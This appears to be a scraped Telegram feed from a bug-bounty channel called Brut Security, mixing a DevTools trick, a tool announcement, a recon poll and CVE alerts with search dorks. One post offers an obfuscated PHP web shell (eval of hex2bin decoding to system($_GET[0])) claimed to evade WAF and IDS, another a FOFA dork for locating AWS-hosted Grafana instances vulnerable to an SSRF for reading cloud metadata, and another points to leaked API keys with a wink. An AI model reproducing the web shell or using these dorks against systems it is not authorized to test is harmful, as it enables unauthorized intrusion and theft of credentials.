Where is the reactions guys ๐ ๐
Please open Telegram to view this post
VIEW IN TELEGRAM
๐ฅ32๐10๐จโ๐ป7๐ณ6โค2๐ซก1
Hey Hunters,
DarkShadow back at it again, dropping something many of you probably never noticed! ๐
Did you know your Chrome DevTools is actually a webpage itself? ๐ฒ
๐ URL:
Yup, you read that right.
Try this:
๐ฅ Open the URL
๐ฅ Then hit F12 inside DevTools
๐ฅ BOOM โ you're debugging the DevTools itself ๐คฏ
Ever seen DevTools inside DevTools?
Welcome to the Devception ๐
Let me know in the comments โ
Who just learned this for the first time?๐
If you enjoy the kind of content I share, show some loveโlike, comment, and share it with your hacker fam.
#bugbountytips
DarkShadow back at it again, dropping something many of you probably never noticed! ๐
Did you know your Chrome DevTools is actually a webpage itself? ๐ฒ
๐ URL:
devtools://devtools/bundled/devtools_app.html
Yup, you read that right.
Try this:
๐ฅ Open the URL
๐ฅ Then hit F12 inside DevTools
๐ฅ BOOM โ you're debugging the DevTools itself ๐คฏ
Ever seen DevTools inside DevTools?
Welcome to the Devception ๐
Let me know in the comments โ
Who just learned this for the first time?๐
If you enjoy the kind of content I share, show some loveโlike, comment, and share it with your hacker fam.
#bugbountytips
๐จโ๐ป16โค12๐ฅ4
Brut Security
๐ข Heads up, folks!
Just released BrutDroid recently โ an automation toolkit for Android emulator testing. Put in a ton of effort, but honestly, the response hasnโt been as strong as expected.
Might make it private soon. If youโre planning to use it or have feedback, nowโs the time! Would love your thoughts.โ๏ธ
โ ๏ธ https://github.com/Brut-Security/BrutDroid/
๐ฌ Feel free to DM or tag me with suggestions.
โ Stay Brut.
Just released BrutDroid recently โ an automation toolkit for Android emulator testing. Put in a ton of effort, but honestly, the response hasnโt been as strong as expected.
Might make it private soon. If youโre planning to use it or have feedback, nowโs the time! Would love your thoughts.
๐ฌ Feel free to DM or tag me with suggestions.
โ Stay Brut.
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - Brut-Security/BrutDroid: BrutDroid - Android Studio Pentest Automator: Streamline mobile pentesting with automated emulatorโฆ
BrutDroid - Android Studio Pentest Automator: Streamline mobile pentesting with automated emulator rooting, Frida, and Burp Suite integration. - Brut-Security/BrutDroid
โค31
Please open Telegram to view this post
VIEW IN TELEGRAM
4๐คฃ30๐2๐ฑ2โค1
Perfect for anyone involved in:
Brut SecurityTake advantage of this opportunity and explore ZoomEyeโs premium features!
#BrutSecurity #ZoomEye
Please open Telegram to view this post
VIEW IN TELEGRAM
โค8
Hey Hunters,
When it comes to dorking and reconnaissance, which search engine is your go-to and why?
When it comes to dorking and reconnaissance, which search engine is your go-to and why?
Anonymous Poll
44%
1๏ธโฃ Google Dorking
25%
2๏ธโฃ Shodan
20%
3๏ธโฃ FOFA (now with AI!)
4%
4๏ธโฃ ZoomEye
2%
5๏ธโฃ Netlas
6%
6๏ธโฃ Censys
โค7
Brut Security
Photo
๐I made this payload that able to bypass WAF even IDS to execute RCE๐
๐Hex decode:
๐คซ DarkShadow's secret payload don't share outside โ
<?=eval(hex2bin("69662824785f3d245f4745545b305d297b73797374656d2824785f293b7d"))?>
๐Hex decode:
if($x_=$_GET[0]){system($x_);
}
๐คซ DarkShadow's secret payload don't share outside โ
โค20๐ฟ8๐3๐ค2
CVE-2025-32756: Buffer Overflow in Fortinet products, 9.8 rating ๐ฅ
Some Fortinet products, including FortiMail, FortiRecorder, and FortiVoice, are vulnerable to a buffer overflow that could allow a remote, unauthenticated attacker to execute arbitrary code or commands.
The vulnerability is not new, but a PoC was recently released!
Search at Netlas.io:
๐ Link: https://nt.ls/nmu5K
๐ Dork: certificate.subject.common_name:"FortiMail" OR certificate.subject.common_name:"FortiRecorder" OR certificate.subject.common_name:"FortiVoice"
Vendor's advisory: https://fortiguard.fortinet.com/psirt/FG-IR-25-254
Some Fortinet products, including FortiMail, FortiRecorder, and FortiVoice, are vulnerable to a buffer overflow that could allow a remote, unauthenticated attacker to execute arbitrary code or commands.
The vulnerability is not new, but a PoC was recently released!
Search at Netlas.io:
๐ Link: https://nt.ls/nmu5K
๐ Dork: certificate.subject.common_name:"FortiMail" OR certificate.subject.common_name:"FortiRecorder" OR certificate.subject.common_name:"FortiVoice"
Vendor's advisory: https://fortiguard.fortinet.com/psirt/FG-IR-25-254
1๐ฅ8โค4๐ซก1
Hey Hunter's,
DarkShadow here back again, just dropping a simple FOFA dork that i made to find all Grafana vulnerable versions which are using AWS and that help to you read all cloud metadata through Grafana SSRF CVE-2025-4123
FOFA dork:
Grep the full dork in comment ๐ฅ
#dork #fofa #bugbountytips
DarkShadow here back again, just dropping a simple FOFA dork that i made to find all Grafana vulnerable versions which are using AWS and that help to you read all cloud metadata through Grafana SSRF CVE-2025-4123
FOFA dork:
app="grafana" && cloud_name="aws" && (body="Grafana v10.0.0"body="Grafana v10.0.1" body="Grafana v10.0.2"body="Grafana v10.0.3" body="Grafana v10.0.4"body="Grafana v10.0.5" body="Grafana v10.0.6"body="Grafana v10.0.7" body="Grafana v10.0.8"body="Grafana v10.0.9" body="Grafana v10.0.10"body="Grafana v10.0.11" body="Grafana v10.0.12"body="Grafana v10.1.0" body="Grafana v10.1.1"body="Grafana v10.1.2" body="Grafana v10.1.3"body="Grafana v10.1.4" body="Grafana v10.1.5"body="Grafana v10.1.6" body="Grafana v10.1.7"body="Grafana v10.1.8" body="Grafana v10.1.9"body="Grafana v10.1.10" body="Grafana v10.2.0"body="Grafana v10.2.1" body="Grafana v10.2.2"body="Grafana v10.2.3" body="Grafana v10.2.4"body="Grafana v10.2.5" body="Grafana v10.2.6"body="Grafana v10.2.7" body="Grafana v10.3.0"body="Grafana v10.3.1" body="Grafana v10.3.2"body="Grafana v10.3.3" body="Grafana v10.3.4"body="Grafana v10.3.5" body="Grafana v10.4.0"body="Grafana v10.4.1" body="Grafana v10.4.2"body="Grafana v10.4.3" body="Grafana v10.4.4"body="Grafana v10.4.5" body="Grafana v10.4.6"body="Grafana v10.4.7" body="Grafana v10.4.8"body="Grafana v10.4.9" body="Grafana v10.4.10"body="Grafana v10.4.11" body="Grafana v10.4.12"body="Grafana v10.4.13" body="Grafana v10.4.14"body="Grafana v10.4.15" body="Grafana v10.4.16"body="Grafana v10.4.17" body="Grafana v11.0.0"body="Grafana v11.0.1" body="Grafana v11.0.2"body="Grafana v11.0.3" body="Grafana v11.0.4"body="Grafana v11.0.5" body="Grafana v11.1.0"body="Grafana v11.1.1" body="Grafana v11.1.2"body="Grafana v11.1.3" body="Grafana v11.1.4"body="Grafana v11.2.0" body="Grafana v11.2.1"body="Grafana v11.2.2" body="Grafana v11.2.3"body="Grafana v11.3.0" body="Grafana v11.3.1"body="Grafana v11.3.2" body="Grafana v11.3.3"body="Grafana v11.4.0" body="Grafana v11.4.1"body="Grafana v11.4.2" body="Grafana v11.4.3"body="Grafana v11.5.0" body="Grafana v11.5.1"body="Grafana v11.5.2" body="Grafana v11.5.3"body="Grafana v11.5.4" body="Grafana v11.5.5"body="Grafana v11.5.6" body="Grafana v11.6.0" || body="Grafana v12.0.0")
Grep the full dork in comment ๐ฅ
#dork #fofa #bugbountytips
โค18๐ฅ7๐2๐ฟ1
CVE-2025-42989: Missing Authorization in SAP NetWeaver, 9.6 rating ๐ฅ
One of the vulnerabilities disclosed in a recent patch allows an authenticated user to escalate their privileges, which could critically impact the integrity and availability of the system.
Search at Netlas.io:
๐ Link: https://nt.ls/lB0fI
๐ Dork: http.body:"This error page was generated by SAP Web Dispatcher!"
Vendor's advisory: https://support.sap.com/en/my-support/knowledge-base/security-notes-news/june-2025.html
One of the vulnerabilities disclosed in a recent patch allows an authenticated user to escalate their privileges, which could critically impact the integrity and availability of the system.
Search at Netlas.io:
๐ Link: https://nt.ls/lB0fI
๐ Dork: http.body:"This error page was generated by SAP Web Dispatcher!"
Vendor's advisory: https://support.sap.com/en/my-support/knowledge-base/security-notes-news/june-2025.html
โค6๐ฑ4
Brut Security
https://www.unsecuredapikeys.com/
Your know, what you have to do ๐
Please open Telegram to view this post
VIEW IN TELEGRAM
๐ค10๐ฅ3
Brut Security pinned ยซ๐จ If you're looking for accurate IoT results, then Sign Up On @Netlas ๐ฎโ๐จ https://app.netlas.io/ref/9cc61538/ยป
Brut Security
๐ New Script Alert โ Subdomain Monitoring (Coming Soon!) from Brut Security For those whoโve been waiting on a simple and efficient way to monitor subdomains automatically โ your wait is almost over. ๐ Weโve been working on a Bash script that: โ
Monitorsโฆ
Please open Telegram to view this post
VIEW IN TELEGRAM
โค24๐ณ6๐5